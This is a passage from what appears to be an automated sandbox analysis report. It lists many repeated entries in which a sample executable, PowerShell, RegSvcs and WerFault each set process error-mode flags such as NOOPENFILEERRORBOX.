              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
